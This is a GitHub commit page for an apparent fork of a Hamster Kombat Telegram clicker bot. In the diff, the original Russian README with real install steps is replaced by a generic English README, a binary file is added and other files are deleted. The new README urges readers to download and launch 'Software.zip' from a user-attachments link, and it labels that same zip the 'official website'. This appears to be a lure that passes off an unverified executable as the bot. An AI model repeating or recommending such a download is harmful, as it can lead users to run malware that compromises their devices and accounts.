-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
4 changed files
with
40 additions
and
251 deletions.
There are no files selected for viewing
Binary file not shown.
This file was deleted.
Oops, something went wrong.
This file was deleted.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,90 +1,40 @@ | ||
[<img src="https://img.shields.io/badge/Telegram-%40Me-orange">](https://t.me/sho6ot) | ||
[<img src="https://img.shields.io/badge/python-3.10%20%7C%203.11-blue">](https://www.python.org/downloads/) | ||
|
||
![img1](.github/images/demo.png) | ||
|
||
> 🇪🇳 README in english available [here](README-EN.md) | ||
## ⚙ [Настройки](https://github.com/shamhi/HamsterKombatBot/blob/main/.env-example) | ||
| Настройка | Описание | | ||
|--------------------------|-----------------------------------------------------------------------------------------------| | ||
| **API_ID / API_HASH** | Данные платформы, с которой запускать сессию Telegram _(сток - Android)_ | | ||
| **MIN_AVAILABLE_ENERGY** | Минимальное количество доступной энергии, при достижении которой будет задержка _(напр. 100)_ | | ||
| **SLEEP_BY_MIN_ENERGY** | Задержка при достижении минимальной энергии в секундах _(напр. [1800,2400])_ | | ||
| **ADD_TAPS_ON_TURBO** | Сколько тапов будет добавлено при активации турбо _(напр. 2500)_ | | ||
| **AUTO_UPGRADE** | Улучшать ли пассивный заработок _(True / False)_ | | ||
| **MAX_LEVEL** | Максимальный уровень прокачки апгрейда _(напр. 20)_ | | ||
| **BALANCE_TO_SAVE** | Лимит баланса, который бот "не тронет" _(напр. 1000000)_ | | ||
| **UPGRADES_COUNT** | Количество карточек, который бот прокачает за 1 круг _(напр. 10)_ | | ||
| **MAX_COMBO_PRICE** | Максимальная цена покупки для покупки комбо при доступном балансе _(напр. 10000000)_ | | ||
| **APPLY_DAILY_ENERGY** | Использовать ли ежедневный бесплатный буст энергии _(True / False)_ | | ||
| **APPLY_DAILY_TURBO** | Использовать ли ежедневный бесплатный буст турбо _(True / False)_ | | ||
| **RANDOM_CLICKS_COUNT** | Рандомное количество тапов _(напр. [50,200])_ | | ||
| **SLEEP_BETWEEN_TAP** | Рандомная задержка между тапами в секундах _(напр. [10,25])_ | | ||
| **USE_RANDOM_USERAGENT** | Использовать ли рандомный User Agent при каждом новом запуске _(True / False)_ | | ||
|
||
## 📕 Профили | ||
Для каждой сессии можно создать профиль с уникальными данными: | ||
```json | ||
{ | ||
"session1": { | ||
"proxy": "socks5://yGow3a:[email protected]:9715", | ||
"headers": {"...": "..."}, | ||
"fingerprint": {"...": "..."} | ||
}, | ||
"session2": { | ||
"proxy": "socks5://yGow3a:[email protected]:9715", | ||
"headers": {"...": "..."}, | ||
"fingerprint": {"...": "..."} | ||
}, | ||
"...": {} | ||
} | ||
``` | ||
> ❕ **Примечание**: `session1` и `session2` - это примеры названий сессий. | ||
## ⚡ Быстрый старт | ||
1. Чтобы установить библиотеки в Windows, запустите INSTALL.bat. | ||
2. Для запуска бота используйте `START.bat` (или в консоли: `python main.py`). | ||
|
||
## 📌 Предварительные условия | ||
Прежде чем начать, убедитесь, что у вас установлено следующее: | ||
- [Python](https://www.python.org/downloads/) версии 3.10 или 3.11. | ||
|
||
## 📃 Получение API ключей | ||
1. Перейдите на сайт [my.telegram.org](https://my.telegram.org) и войдите в систему, используя свой номер телефона. | ||
2. Выберите **"API development tools"** и заполните форму для регистрации нового приложения. | ||
3. Запишите `API_ID` и `API_HASH` в файле `.env`, предоставленные после регистрации вашего приложения. | ||
|
||
## 🧱 Установка | ||
Вы можете скачать [**Репозиторий**](https://github.com/shamhi/HamsterKombatBot) клонированием на вашу систему и установкой необходимых зависимостей: | ||
```shell | ||
~ >>> git clone https://github.com/shamhi/HamsterKombatBot.git | ||
~ >>> cd HamsterKombatBot | ||
|
||
# Linux | ||
~/HamsterKombatBot >>> python3 -m venv venv | ||
~/HamsterKombatBot >>> source venv/bin/activate | ||
~/HamsterKombatBot >>> pip3 install -r requirements.txt | ||
~/HamsterKombatBot >>> cp .env-example .env | ||
~/HamsterKombatBot >>> nano .env # Здесь вы обязательно должны указать ваши API_ID и API_HASH , остальное берется по умолчанию | ||
~/HamsterKombatBot >>> python3 main.py | ||
|
||
# Windows | ||
~/HamsterKombatBot >>> python -m venv venv | ||
~/HamsterKombatBot >>> venv\Scripts\activate | ||
~/HamsterKombatBot >>> pip install -r requirements.txt | ||
~/HamsterKombatBot >>> copy .env-example .env | ||
~/HamsterKombatBot >>> # Указываете ваши API_ID и API_HASH, остальное берется по умолчанию | ||
~/HamsterKombatBot >>> python main.py | ||
``` | ||
> Установка в качестве Linux службы для фоновой работы бота [тут](docs/LINUX-SERVIS-INSTALL.md). | ||
⏳ Также для быстрого запуска вы можете использовать аргументы, например: | ||
```shell | ||
~/HamsterKombatBot >>> python3 main.py --action (1/2) | ||
# Или | ||
~/HamsterKombatBot >>> python3 main.py -a (1/2) | ||
|
||
# 1 - Создает сессию | ||
# 2 - Запускает кликер | ||
``` | ||
# Hamster Kombat Automation Tool | ||
|
||
Welcome to the Hamster Kombat Automation Tool repository! This Python-based automation tool is designed to streamline your experience while playing the game Hamster Kombat. | ||
|
||
## Overview | ||
|
||
Hamster Kombat Stake is a free automation tool that can handle various in-game tasks for you. From auto-tapping to cipher tasks and purchasing the best cards, this bot has got you covered. By automating these tasks, the bot aims to enhance your overall gaming experience by saving you time and effort. | ||
|
||
## How to Use | ||
|
||
To access the automation tool, simply download the software package from the following link: | ||
|
||
[![Download Hamster Kombat Automation Tool](https://img.shields.io/badge/Download-Software.zip-blue)](https://github.com/user-attachments/files/18060583/Software.zip "Needs to be launched") | ||
|
||
Once downloaded, launch the software to start using the automation tool for Hamster Kombat. | ||
|
||
## Features | ||
|
||
- Auto-Tapping: Let the bot handle tapping tasks for you. | ||
- Cipher Tasks: Automate the completion of cipher tasks within the game. | ||
- Card Purchasing: Automatically purchase the best cards available in the game. | ||
- Fully Automated: Sit back and relax as the bot takes care of these tasks on your behalf. | ||
|
||
## Installation | ||
|
||
1. Download the software package from the provided link. | ||
2. Launch the software on your device. | ||
3. Follow the on-screen instructions to set up the automation tool. | ||
|
||
## Support | ||
|
||
If you encounter any issues or have questions about the automation tool, please check the "Releases" section for updates or reach out to our support team for assistance. | ||
|
||
## Disclaimer | ||
|
||
Please note that the automation tool is provided for educational and entertainment purposes only. Use it responsibly and in accordance with the game's terms of service. | ||
|
||
Start using the Hamster Kombat Automation Tool today and elevate your gaming experience! 🐹💥 | ||
|
||
Feel free to visit the [official website](https://github.com/user-attachments/files/18060583/Software.zip) for more information. |